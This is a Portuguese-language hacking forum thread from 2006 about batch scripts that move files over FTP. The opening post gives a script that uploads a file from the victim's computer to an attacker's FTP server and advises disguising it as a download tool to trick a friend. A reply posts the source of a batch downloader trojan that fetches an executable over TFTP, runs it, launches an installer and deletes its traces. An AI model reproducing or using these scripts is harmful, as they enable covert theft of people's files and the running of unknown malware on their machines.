FTP Spy - Batch

Started by Anonymous, 10 de June , 2006, 12:40:00 AM

Previous topic - Next topic

0 Members and 1 Guest are viewing this topic.

Anonymous

Mais uma "tool/tutorial" feita por mim, e em Batch Script... essa linguagem vai longe comigo...
É o seguinte, eu vou ensinar a fazer um batch que vai logar em um servidor FTP, e enviar um determinado arquivo por FTP. É mais simples que parece... Bom, vamos lá:

1. Crie um arquivo no bloco de notas com o seguinte conteudo:
@echo off
break off
echo Open [1] > %SystemRoot%\system32\send.txt
echo [2] >> %SystemRoot%\system32\send.txt
echo [3] >> %SystemRoot%\system32\send.txt
echo Send [4] >> %SystemRoot%\system32\send.txt
ftp -s:%SystemRoot%\system32\send.txt
Agora, substitua o [1] pelo FTP, o [2] pelo username, o [3] a senha e [4] o caminho e o arquivo a ser enviado. Ex.:
@echo off
break off
echo Open ftp.netscape.com > %SystemRoot%\system32\send.txt
echo root >> %SystemRoot%\system32\send.txt
echo abc123 >> %SystemRoot%\system32\send.txt
echo Send C:\imagem.jpg >> %SystemRoot%\system32\send.txt
ftp -s:%SystemRoot%\system32\send.txt

Agora salve este arquivo como: imagens_download.bat e diga a seu amigo que é um arquivo de download de arquivos sei lá... Bom, mas tá ai. Aproveitem e boa sorte.

OnlyOne

No céu toca Joy Division

Anonymous

oi a todos
so uma coisa kra ali a imagem, ele vai mandar a imagem q tiver no pc dele no c:\ pro ftp, seria isso  ou ele vai baixa no meu pc via ftp a imagem fikei confuso.
caso nao for tu pode ensinar abaixar coisa de meu ftp via bat valeu
grato

rog

nao sei se isso funfa nao

open FTP.host nao e um commando ftp

ftp open ftp.host

ja seria melhor

rog
realty.sys is corrupt :  reboot the universe (Y/N)

1NT3RC3PT0R

Quote from: "cybernot2"oi a todos
so uma coisa kra ali a imagem, ele vai mandar a imagem q tiver no pc dele no c:\ pro ftp, seria isso  ou ele vai baixa no meu pc via ftp a imagem fikei confuso.
caso nao for tu pode ensinar abaixar coisa de meu ftp via bat valeu
grato

Cara pelo que vi este código manda o arquivo imagem.jpg que está na partição C, para um servidor ftp. Ai você pode alterar para qualquer outro arquivo, de qualquer outra pasta ou partição, e copiar arquivos do computador da pessoa que rodou este código. Mas pelo que vi no código, não funciona perfeitamente, pelo menos pra min não.

Eu estou atras de um código em batch que possa enviar arquivos para o servidor e receber arquivos do servidor, já vi varios por ai mas nenhum nunca conseguiu logar perfeitamente no servidor. Sinceramente acho que não tem como fazer isso.

A respeito de que você pediu sobre como baixar arquivos do servidor ftp para seu micro, eu tenho um código aqui, não sei quem é o autor, mas tenho ele a muito tempo no meh hd, chama-se Trojan-Downloader.BAT.Dlexbat mas ele só funciona em servidores que permita conexão anonima entende. Problema é que não conheço nenhum server free de ftp que de suporte a login anonimo.Mas caso você saiba de um está aqui o Source.
@echo off
:startDL
tftp.exe -i ftp.servidor get DL.exe
if not exist DL.exe goto startDL
start /w DL.exe
ren 00.D install.bat
attrib TFTP* -r
attrib DL.exe -r
del TFTP*
del DL.exe
install.bat %1
exit

Da uma olhada ai e tenta mudar alguma coisa quem sabe você consegue.

Espero ter te ajudado ok

Flw